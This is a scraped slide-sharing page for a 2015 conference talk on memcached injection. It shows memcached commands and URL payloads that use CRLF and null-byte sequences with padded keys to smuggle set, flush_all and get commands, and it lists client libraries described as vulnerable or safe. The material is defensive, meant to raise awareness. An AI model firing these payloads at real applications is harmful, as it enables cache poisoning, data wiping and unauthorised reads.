Memcache Injection (Hacktrick'15)
•
0 likes•1,854 views
This document discusses Memcache injection, which is a technique for injecting malicious code into Memcached servers. It demonstrates how to inject newline characters to overwrite cached values and execute arbitrary commands. It also lists some programming languages and libraries that are vulnerable, as well as content management systems that could be impacted. Safe libraries and updated systems that have addressed this issue are also mentioned. The document aims to raise awareness of this Memcached injection technique and provide information to help secure systems.
Report
Share
Memcache Injection (Hacktrick'15)
- 1. Memcache Injection Ömer Çıtak – Hacktrick’15
- 2. Full-Stack Developer @ Cydets Inc. development && security www.omercitak.com Social : @Om3rCitak #! whoami
- 6. > set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END #! telnet 127.0.0.1 11211
- 10. ?key=omer 0 10 6 rn hacked rn urlencode(‘r’) = %0d urlencode(‘n’) = %0a ?key=omer 0 10 6 %0d%0a hacked %0d%0a #! phpstorm memcached.php
- 11. #! telnet 127.0.0.1 11211 > set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
- 12. ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=aaaaa…(251) flush_all %0d%0a #! phpstorm memcached.php
- 15. > get key_omer < VALUE key_omer 0 6 < 123456 < END #! phpstorm memcached.php
- 16. ?key=aaa (251) %0d%0a get omer 0 6 #! phpstorm memcached.php
- 17. > get aaa (251) < ERROR < get omer < VALUE omer 0 6 < 353535 < END #! phpstorm memcached.php
- 18. Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached #! cat vulnerable_libraries
- 19. Python : python-memcache Php : memcache Java : java.net.spy.memcached #! cat safe_libraries
- 20. • Wordpress • Joomla 3.2.2 • Piwik 2.1.0 • MODX Revolution 2.3 #! cat using_memcached
- 21. fixed?
- 22. fixed?
- 23. #! questions?
- 24. Thanks <3 www.omercitak.com Social : @Om3rCitak #! exit